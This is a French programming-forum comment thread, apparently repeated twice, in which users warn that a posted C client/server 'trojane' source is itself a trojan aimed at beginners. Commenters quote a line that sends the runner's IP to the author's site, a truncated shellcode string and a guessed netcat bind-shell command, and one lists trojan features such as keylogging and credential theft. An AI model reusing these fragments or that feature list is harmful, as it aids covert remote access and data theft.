cs_max12
Messages postés1491Date d'inscriptiondimanche 19 novembre 2000StatutModérateurDernière intervention 7 juillet 2014 27 juil. 2007 à 22:15
Souvent c'est windows.h, winsock2.h qui manque car SOCKET étant un typedef Windows only (nux = int)
thedarkosa
Messages postés1Date d'inscriptiondimanche 7 janvier 2007StatutMembreDernière intervention27 juillet 2007 27 juil. 2007 à 21:54
J'aimerais savoir quand cela ce fait t'il que sous DEV j'ai une erreur de compilation qui me dit que à la ligne 33 " `SOCKET' was not declared in this scope "
J'aimerais savoir comment eliminer ce bug si quelqu'un sait
Merci d'avance
LeFauve42
Messages postés239Date d'inscriptionvendredi 20 octobre 2006StatutMembreDernière intervention20 avril 2009 24 juil. 2007 à 09:42
>Crois-moi, un programme bien écrit et bien structuré est un programme où tu as éliminé 70%
>de bugs immédiat et 20% de bug de fonctionnement en moins d'une heure (les 10% restants ...
> hummm... spécification d'utilisation :D )
Je crois que le but ici n'est pas de fournir un exemple de programmation, mais plutot de tenter les "wannabe hackers" et de detourner leur PC. Moins le code est clair, plus il est facile de passer a cote des bouts de codes malicieux... (98 lignes pour une fonction qui renome un fichier... faut pas deconner, meme en assembleur on doit pouvoir faire plus court :o) ).
Je soupconnais que le "start" servait a recuperer l'adresse IP, mais je n'avais pas tilte sur le nom du script php... LOL. Maintenant, je n'ai plus beaucoup de doute non plus...
Je serais quand meme curieux de savoir ce que fait la partie assemblee en dur... Je pencherais pour un truc genre "nc -L -e cmd.exe" mais ce n'est qu'une intuition...
Eric
mickbad
Messages postés71Date d'inscriptionmercredi 17 juillet 2002StatutMembreDernière intervention20 avril 2008 24 juil. 2007 à 09:28
Bonjour,
Personnellement et au delà du sujet, je trouve que le code n'est pas vraiment bien écrit. Excuse moi de dire ça mpo007 mais quand on veut faire profiter l'humanité d'un code (pour reprendre l'expression d'un de mes illustres posteurs qui m'ont précédé ;)) on essaye d'arranger le code pour que ça soit joli à regarder et fonctionnel. Quand on code il faut justement penser aux autres personnes susceptibles de le lire (et bonjour la maintenance ensuite, non ?)
Franchement, faire une api pour le travail de socket est mieux car tu pourrais réutiliser ce code comme une couche indépendante. etc etc etc ...
Arf de toute façon, je trouve aussi le code un peu malsain avec ce genre d'instruction
system("start http://max.wal.ifrance.com/ip2.php"); /// HAHAHA ip2.php ... mdr
d'ailleurs utilise les apis win32 pour faire ça au lieu d'utiliser de faire confiance au système d'exploitation surtout que le start t'ouvre une fenêtre.
Maintenant je te dis ça en toute amitié et j'espère que cela va te servir de base pour une meilleure programmation. Crois-moi, un programme bien écrit et bien structuré est un programme où tu as éliminé 70% de bugs immédiat et 20% de bug de fonctionnement en moins d'une heure (les 10% restants ... hummm... spécification d'utilisation :D )
Dernière chose : je ne recommande pas non plus l'utilisation de ce code sans modifications préalables
bonne continuation ...
Mick
Cr30s
Messages postés12Date d'inscriptionjeudi 6 avril 2006StatutMembreDernière intervention 3 juin 2008 23 juil. 2007 à 18:13
Et s'il te plaît fait un effort sur la rédaction, il y a de la faute de frappe à tout bout de champ .
De plus je suis tout à fait d'accord avec Eric, c'est carrément du social engineering mais de mauvais
goût : surtout quand on voit les bouts de commentaires avec "victime" .
Je crois que la var "janbar" va devenir mythique ... :D . En tout cas j'ai rigolé 5 bonnes minutes, merci .
LeFauve42
Messages postés239Date d'inscriptionvendredi 20 octobre 2006StatutMembreDernière intervention20 avril 2009 23 juil. 2007 à 10:50
Salut,
A propos de Trojan, est-ce que quelqu'un a essaye de desassembler la fonction encodee dans la variable janbar ?
unsigned char janbar[500]=
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74...
J'avoue que ca ne donne pas super confiance... Le titre aguicheur du post, les bouts de code client serveur basiques que tout le monde connait, et le fait que le topic soit destine aux debutants...
Je me trompe peut-etre, mais ca sent vraiment le trojan :o)
Sans parler de la connection au site automatiquement au demarrage (ou comment envoyer votre adresse IP a l'auteur d'un code "non facilement decriptable" qui entre autre ouvre un port sur votre PC).
Pour revenir au cote educatif de ce source, c'est une variante interessante de ce qu'on appelle le "social engineering" ou comment faire faire a votre victime ce que vous ne pouvez pas faire a sa place (dans ce cas, installer un serveur permettant un controle "efficace" de votre ordinateur.
Sinon, je dirais qu'il y a des tas de framework client/serveurs un peu mieux ecrits (mais peut-etre que le fait que ce ne soit pas trop facile a relire est voulu).
De plus, pourquoi inclure nc, alors que le telnet standard de Windows devrait fonctionner aussi ? (enfin, peut-etre qu'avoir nc sur le pc en local permet de creer de nouvelles failles de securite (n'oubliez pas que netcat marche dans les deux sens et peu entre autre lancer une commande redirigee vers un port IP)).
Bref, mon conseil: N'essayez pas ce programme si vous ne comprenez pas ce qu'il fait (surtout la commande max007_get_you_cmd() au nom si evocateur...), et commentez au moins la ligne qui envoie votre adresse IP chez Max (si vous ne pouvez identifier cette ligne par vous meme, un conseil, laissez tomber :o) ).
Eric
cs_omnia
Messages postés240Date d'inscriptionjeudi 9 janvier 2003StatutMembreDernière intervention22 mars 2009 17 juil. 2007 à 22:44
Salut, ton code est assez basique en fait, rien d'exeptionnel, il y a déja, une multitude de clients /serveurs qui trainent sur le site...
Pour ta petite touche hacker, franchement lol <no comment>
sinon il serait intéressant d'ajouter à ton serveur un moyen de lire le registre, récupérer les authentifiant actuels, keylogger, de masquer sa présence, effacer ses traces, etc.. si tu veux te rapprocher beaucoup plus d'un trojen?
sinon "trojane" en trojan, c'est quand même mieux (juste comme ca, moi et l'orthographe =-5000 ):p
cs_aardman
Messages postés1905Date d'inscriptionmercredi 22 janvier 2003StatutMembreDernière intervention17 septembre 20123 17 juil. 2007 à 20:46
Je te critiquais pas personnelement, c'est juste ton explication finale qui est marrante, car elle contredis completement le code que tu postes.
C'est un truc qu'on vois de temp en temp ici, quelqu'un poste une source pour la science, pour aider l'humanité, et non pas pour faire du mal aux gens. Apres quand regarde le code source, tu trouves plein de commentaires comme infecter un pc, supprimer les fichiers de la victime, etc.
Logique quoi :)
mpo007
Messages postés12Date d'inscriptionjeudi 6 juillet 2006StatutMembreDernière intervention 7 mars 2009 17 juil. 2007 à 15:27
c'est vrai max12 que on apprend beaucoup de choses dans la programmation system.dans ce programme par exemple.mais je tiens à ce que je te dise que trojane ça n'existe pas dans la programmation system on parle plutôt de client/serveur ou de socket.mais trojane ça se dit souvent par des lamers ou crachers ceux qui veulent causer du mal aux autres.et une derniere chose à "AARDMAN" essaye de commprendre ma source plutôt que de crétiquer les gens comme ça,j'ai mit cette source pour aider les gens et pour que les gens m'aident.on s'entre-aide ici mais on critique pas les gens comme ça.
cs_max12
Messages postés1491Date d'inscriptiondimanche 19 novembre 2000StatutModérateurDernière intervention 7 juillet 2014 17 juil. 2007 à 02:11
Bah ose dire en toute honnêteté que coder un trojan c'est pas super-instructif ;p (On touche a plein de chose dans un même programme)
cs_aardman
Messages postés1905Date d'inscriptionmercredi 22 janvier 2003StatutMembreDernière intervention17 septembre 20123 16 juil. 2007 à 21:33
j'aime bien le passage sur le hacking c'est bien on fait ca pour la connaissance etc
c'est toujours marrant de lire ce genre de chose...
27 juil. 2007 à 22:15
27 juil. 2007 à 21:54
J'aimerais savoir comment eliminer ce bug si quelqu'un sait
Merci d'avance
24 juil. 2007 à 09:42
>de bugs immédiat et 20% de bug de fonctionnement en moins d'une heure (les 10% restants ...
> hummm... spécification d'utilisation :D )
Je crois que le but ici n'est pas de fournir un exemple de programmation, mais plutot de tenter les "wannabe hackers" et de detourner leur PC. Moins le code est clair, plus il est facile de passer a cote des bouts de codes malicieux... (98 lignes pour une fonction qui renome un fichier... faut pas deconner, meme en assembleur on doit pouvoir faire plus court :o) ).
Je soupconnais que le "start" servait a recuperer l'adresse IP, mais je n'avais pas tilte sur le nom du script php... LOL. Maintenant, je n'ai plus beaucoup de doute non plus...
Je serais quand meme curieux de savoir ce que fait la partie assemblee en dur... Je pencherais pour un truc genre "nc -L -e cmd.exe" mais ce n'est qu'une intuition...
Eric
24 juil. 2007 à 09:28
Personnellement et au delà du sujet, je trouve que le code n'est pas vraiment bien écrit. Excuse moi de dire ça mpo007 mais quand on veut faire profiter l'humanité d'un code (pour reprendre l'expression d'un de mes illustres posteurs qui m'ont précédé ;)) on essaye d'arranger le code pour que ça soit joli à regarder et fonctionnel. Quand on code il faut justement penser aux autres personnes susceptibles de le lire (et bonjour la maintenance ensuite, non ?)
Franchement, faire une api pour le travail de socket est mieux car tu pourrais réutiliser ce code comme une couche indépendante. etc etc etc ...
Arf de toute façon, je trouve aussi le code un peu malsain avec ce genre d'instruction
system("start http://max.wal.ifrance.com/ip2.php"); /// HAHAHA ip2.php ... mdr
d'ailleurs utilise les apis win32 pour faire ça au lieu d'utiliser de faire confiance au système d'exploitation surtout que le start t'ouvre une fenêtre.
Maintenant je te dis ça en toute amitié et j'espère que cela va te servir de base pour une meilleure programmation. Crois-moi, un programme bien écrit et bien structuré est un programme où tu as éliminé 70% de bugs immédiat et 20% de bug de fonctionnement en moins d'une heure (les 10% restants ... hummm... spécification d'utilisation :D )
Dernière chose : je ne recommande pas non plus l'utilisation de ce code sans modifications préalables
bonne continuation ...
Mick
23 juil. 2007 à 18:13
C'est quand même osé cette ligne : mouahahah
Et s'il te plaît fait un effort sur la rédaction, il y a de la faute de frappe à tout bout de champ .
De plus je suis tout à fait d'accord avec Eric, c'est carrément du social engineering mais de mauvais
goût : surtout quand on voit les bouts de commentaires avec "victime" .
Je crois que la var "janbar" va devenir mythique ... :D . En tout cas j'ai rigolé 5 bonnes minutes, merci .
23 juil. 2007 à 10:50
A propos de Trojan, est-ce que quelqu'un a essaye de desassembler la fonction encodee dans la variable janbar ?
unsigned char janbar[500]=
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74...
J'avoue que ca ne donne pas super confiance... Le titre aguicheur du post, les bouts de code client serveur basiques que tout le monde connait, et le fait que le topic soit destine aux debutants...
Je me trompe peut-etre, mais ca sent vraiment le trojan :o)
Sans parler de la connection au site automatiquement au demarrage (ou comment envoyer votre adresse IP a l'auteur d'un code "non facilement decriptable" qui entre autre ouvre un port sur votre PC).
Pour revenir au cote educatif de ce source, c'est une variante interessante de ce qu'on appelle le "social engineering" ou comment faire faire a votre victime ce que vous ne pouvez pas faire a sa place (dans ce cas, installer un serveur permettant un controle "efficace" de votre ordinateur.
Sinon, je dirais qu'il y a des tas de framework client/serveurs un peu mieux ecrits (mais peut-etre que le fait que ce ne soit pas trop facile a relire est voulu).
De plus, pourquoi inclure nc, alors que le telnet standard de Windows devrait fonctionner aussi ? (enfin, peut-etre qu'avoir nc sur le pc en local permet de creer de nouvelles failles de securite (n'oubliez pas que netcat marche dans les deux sens et peu entre autre lancer une commande redirigee vers un port IP)).
Bref, mon conseil: N'essayez pas ce programme si vous ne comprenez pas ce qu'il fait (surtout la commande max007_get_you_cmd() au nom si evocateur...), et commentez au moins la ligne qui envoie votre adresse IP chez Max (si vous ne pouvez identifier cette ligne par vous meme, un conseil, laissez tomber :o) ).
Eric
17 juil. 2007 à 22:44
Pour ta petite touche hacker, franchement lol <no comment>
sinon il serait intéressant d'ajouter à ton serveur un moyen de lire le registre, récupérer les authentifiant actuels, keylogger, de masquer sa présence, effacer ses traces, etc.. si tu veux te rapprocher beaucoup plus d'un trojen?
sinon "trojane" en trojan, c'est quand même mieux (juste comme ca, moi et l'orthographe =-5000 ):p
http://www.dicodunet.com/definitions/internet/cheval-de-troie.htm
bonne continuation.
17 juil. 2007 à 20:46
C'est un truc qu'on vois de temp en temp ici, quelqu'un poste une source pour la science, pour aider l'humanité, et non pas pour faire du mal aux gens. Apres quand regarde le code source, tu trouves plein de commentaires comme infecter un pc, supprimer les fichiers de la victime, etc.
Logique quoi :)
17 juil. 2007 à 15:27
17 juil. 2007 à 02:11
16 juil. 2007 à 21:33
c'est toujours marrant de lire ce genre de chose...